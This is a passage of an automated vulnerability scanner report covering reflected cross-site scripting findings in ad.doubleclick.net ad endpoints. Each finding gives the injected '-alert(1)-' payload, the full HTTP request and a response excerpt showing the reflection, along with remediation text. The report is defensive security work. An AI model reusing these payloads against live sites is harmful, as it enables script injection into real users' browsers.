Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 955d3"-alert(1)-"79fca5d6b07 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221955d3"-alert(1)-"79fca5d6b07&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5272
Date: Tue, 28 Jun 2011 02:30:29 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
%3Bh%3Dv8/3b34/17/174/%2a/n%3B239242768%3B2-0%3B0%3B62126625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221955d3"-alert(1)-"79fca5d6b07&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/Rad
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e83e6"-alert(1)-"517e13c6861 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579e83e6"-alert(1)-"517e13c6861&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5272
Date: Tue, 28 Jun 2011 02:30:11 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
ck.net/click%3Bh%3Dv8/3b34/17/174/%2a/n%3B239242768%3B2-0%3B0%3B62126625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579e83e6"-alert(1)-"517e13c6861&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM
...[SNIP]...

1.8. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7636"-alert(1)-"63cd2f45aaf was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c7636"-alert(1)-"63cd2f45aaf&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5236
Date: Tue, 28 Jun 2011 02:30:53 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
%3B0%3B62126625%3B4307-300/250%3B42562264/42580051/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530c7636"-alert(1)-"63cd2f45aaf&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f5662
...[SNIP]...

1.9. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload edf41"-alert(1)-"547d679179c was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=edf41"-alert(1)-"547d679179c HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4862
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 02:31:02 GMT
Expires: Tue, 28 Jun 2011 02:31:02 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
26625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=438012336877076870&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=edf41"-alert(1)-"547d679179chttp://t.mookie1.com/t/v1/clk?migAgencyId=43&migSource=adsrv2&migTrackDataExt=2782903;62126625;239242768;42719607&migRandom=4631798&migTrackFmtExt=client;io;ad;crtv&migUnencodedDest=http://radioshackwi
...[SNIP]...

1.10. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3867.270604.B3/B5387288.6

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 70a14"-alert(1)-"5a45727816e was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3867.270604.B3/B5387288.6;sz=300x250;click0=http://pixel.mathtag.com/click/img?mt_aid=43801233687707687070a14"-alert(1)-"5a45727816e&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_SELL_2011Q2_MM_GEN_300/RadioShack_SELL_2011Q2.html/726348573830334f56626741436d4566?;ord=1677198035? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHAA4GIkAAAAAAPReJQAAAAAAAgAEAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAAAZ.jAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAIAccl2mPwAAAAAAAAAAAACAHHJdpj8AAAAAAAAAAAAAgBxyXaY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAcf4k7BSFSCrL5KgAWIIvj0.SRpNsR3m0OP5t-AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D1010928057%26r%3D0%26s%3D1887835,70b445e8-a12e-11e0-b361-cf235a3adb18
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5272
Date: Tue, 28 Jun 2011 02:29:54 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 6,329 Template Name = 1. Banner Creative (Flash) - In Pag
...[SNIP]...
/ad.doubleclick.net/click%3Bh%3Dv8/3b34/17/174/%2a/n%3B239242768%3B2-0%3B0%3B62126625%3B4307-300/250%3B42719607/42737394/1%3B%3B%7Esscs%3D%3fhttp://pixel.mathtag.com/click/img?mt_aid=43801233687707687070a14"-alert(1)-"5a45727816e&mt_id=112579&mt_adid=221&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/MediaMathB3/RadioShack/SELL_2011Q2/300/L38/1677198035/x90/USNetwork/RS_S
...[SNIP]...

1.11. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the mt_adid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c057"-alert(1)-"6f219f1e3a4 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=1006048c057"-alert(1)-"6f219f1e3a4&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 5998
Date: Tue, 28 Jun 2011 02:33:08 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
se Sapphire DRTV 300x250NoVisaLogo.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=1006048c057"-alert(1)-"6f219f1e3a4&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.chasesapphire.com/%3FCELL%3D62CG");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "ffffff";
v
...[SNIP]...

1.12. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the mt_id request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ccf69"-alert(1)-"a746c5cd003 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971ccf69"-alert(1)-"a746c5cd003&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Date: Tue, 28 Jun 2011 02:32:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
mdn.net/3094545/Chase_Sapphire_10k No Fee_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971ccf69"-alert(1)-"a746c5cd003&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner%26utm_campai
...[SNIP]...

1.13. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [mt_uuid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the mt_uuid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d35fd"-alert(1)-"5de782ce6f7 was submitted in the mt_uuid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530d35fd"-alert(1)-"5de782ce6f7&redirect=;ord=464962131378045477? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?sIBdAFvOHABIVo0AAAAAAHusIwAAAAAAAgAUAQIAAAAAAP8AAAACFnMOLwAAAAAAGY8fAAAAAABgyy4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ9hEAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAMDVV5ehPwAAAAAAAAAAAADA1VeXoT8AAAAAAAAAAAAAgO22i6M.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADHqbfipCFSCpFJ-e-n244DeWRjAmXzmAAvWY.2AAAAAA==,,http%3A%2F%2Fd.tradex.openx.com%2Fafr.php%3Frefresh%3D40%26zoneid%3D5517%26cb%3Dinsert_random_number_here%26loc%3D,B%3D10%26Z%3D300x250%26_salt%3D3185425456%26r%3D0%26s%3D1887835,cfbd56ec-a12e-11e0-af78-e38c13d076c9
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6328
Date: Tue, 28 Jun 2011 02:33:30 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 14,316 Template Name = Watermark Banner Creative (Flash) -
...[SNIP]...
minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530d35fd"-alert(1)-"5de782ce6f7&redirect=http%3a%2f%2fwww.getchasesapphire.com/%3FCELL%3D6WRS%26MSC%3DZ10KP63006897%26utm_source%3D802879%26utm_medium%3Dbanner%26utm_campaign%3D5383603%26utm_content%3DZ10KP");
var fscUrl = url;
var
...[SNIP]...

1.14. http://ad.doubleclick.net/adi/N5762.mediamath.com/B5383603.5 [redirect parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5762.mediamath.com/B5383603.5

Issue detail

The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 926de"-alert(1)-"6a870769378 was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5762.mediamath.com/B5383603.5;sz=300x250;click1=http://pixel.mathtag.com/click/img?mt_aid=464962131378045477&mt_id=114971&mt_adid=100604&mt_uuid=4dd07bc8-e97b-118c-3dec-7b8c5c306530&redirect=926de"-alert(1)-"6a870769378 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
